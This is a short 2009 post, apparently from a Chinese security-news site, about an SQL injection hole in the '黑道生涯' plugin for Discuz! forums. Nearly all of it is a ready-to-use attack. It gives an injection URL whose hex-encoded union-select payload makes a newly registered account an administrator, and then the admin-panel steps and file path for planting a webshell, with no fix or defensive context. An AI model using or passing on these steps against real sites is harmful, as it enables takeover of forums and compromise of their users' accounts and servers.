Discuz!黑道生涯插件注射漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-07-27
Discuz!黑道生涯插件注射漏洞 插件版本:2.2  2.5

注册一个论坛ID
IE提交下面代码

blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/

提升到管理员

discuz7.0.0后台得webshell方法
/Article/200907/40200.html

如果是discuz6.0 的后台就提交 
admincp.php?action=styles&edit=1 
最后得到的webshell地址还是forumdata/cache/style_1.php

ps:貌似xxbing就是这样日t00ls的?

上一篇:CommuniGate Pro WebMail URL解析 HTML注入 漏洞
下一篇:Phorum的过滤引擎参数验证缺陷 HTML代码注入漏洞

最近更新

随机推荐